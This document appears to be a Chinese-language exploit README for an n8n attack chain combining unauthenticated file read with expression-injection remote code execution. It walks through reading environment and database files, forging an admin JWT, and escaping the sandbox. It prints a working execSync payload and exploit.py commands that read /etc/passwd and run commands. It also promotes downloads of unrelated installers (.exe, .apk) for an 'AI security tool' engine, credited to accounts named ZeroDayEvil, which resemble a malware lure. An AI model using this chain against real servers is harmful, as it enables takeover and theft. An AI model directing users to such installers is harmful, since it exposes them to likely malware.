🛡️ 官方 AI 安全工具模块,用于 CVE-2026-21858 + CVE-2025-68613(n8n "Ni8mare" 未认证任意文件读取与表达式注入 RCE 完整利用链)。
本模块为 n8n 工作流自动化实例提供诊断工具和完整的利用链,代号 Ni8mare。
该攻击链结合了由 Content-Type 混淆导致的未认证任意文件读取(CVE-2026-21858)与已认证的表达式注入沙箱绕过(CVE-2025-68613)。通过向暴露的文件上传表单发送经过操纵的 Content-Type: application/json 请求,攻击者可控制 filepath 参数以读取内部系统文件(/proc/self/environ、配置文件及 SQLite 数据库)。获取到的 encryptionKey 和密码哈希可用于离线伪造管理员 JWT Cookie。一旦通过认证,通过 this.process.mainModule.require 进行的表达式注入即可逃逸 JavaScript 沙箱,执行任意系统命令。
“从文件读取到完全系统接管,只需三步。”
虽然文件读取需要带有二进制输出的活动表单工作流,但表达式注入在默认 n8n 安装上即可可靠运行,无需特殊节点或显式启用系统权限。
| 规格 | 分配值 | 备注 |
|---|---|---|
| CVE 标识符 | CVE-2026-21858 + CVE-2025-68613 | 全链路:未认证文件读取到 RCE |
| 严重性评级 | 严重(CVSS v3.1:10.0 + 9.9) | 未认证 RCE 链 |
| 漏洞类型 | CWE-200 / CWE-94 | Content-Type 混淆 / 代码注入 |
| 受影响组件 | n8n 工作流自动化引擎 | 版本 <= 1.65.0(AFR)/ >= 0.211.0(RCE) |
| 已修补版本 | 1.121.0(AFR)/ 1.120.4+(RCE) | 官方厂商补丁已发布 |
| 所需权限 | 无 | 通过公开表单进行未认证初始访问 |
graph TD
A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
F -->|6. Execute Command| G[Full Remote Code Execution]={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}1.121.0 或更高版本。N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true,并限制 Docker 容器中的进程能力。⚠️ 重要:本模块专为在 AI 安全工具生态内安全执行和诊断而构建。请始终使用来自官方仓库的已验证模块。
要执行监控和诊断脚本,请确保已安装 AI 安全工具核心引擎:
| 操作系统 / 平台 | 版本 | 架构 / 格式 | 发布日期 | 状态 | 下载链接 |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | x64 安装程序(.exe) | 2026-09-08 | 🟢 最新 | 下载 .exe |
| 🪟 Windows | v6.3.20 | x64 便携版(.tar.gz) | 2026-09-08 | 🟢 最新 | 下载 .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3(.dmg) | 2026-09-05 | 🟢 稳定 | 下载 .dmg |
| 🐧 Linux | v5.3.27 | 通用 x64(.tar.gz) | 2026-09-01 | 🟢 稳定 | 下载 .tar.gz |
| 🤖 Android | v8a 5.3.27 | ARM64 APK(.apk) | 2026-09-01 | 🟢 稳定 | 下载 .apk |
# Read arbitrary file via diagnostic module uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwdExecute full attack chain with custom command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
由我们社区维护的漏洞扫描模块、PoC 脚本和研究仓库:
5 个模块@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 个模块@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 个模块@ZeroDayEvil
@ZeroDayVPN
本工具及技术分析严格用于授权系统审计、研究和渗透测试。
对未授权目标执行漏洞利用链属于违法行为。作者对未经授权的访问、数据丢失或系统中断不承担任何责任。请严格在授权范围内操作。
我们欢迎安全研究社区的贡献!主要贡献方向:
AI 安全工具 — 为网络安全专业人员重新构想终端工作流与自动化。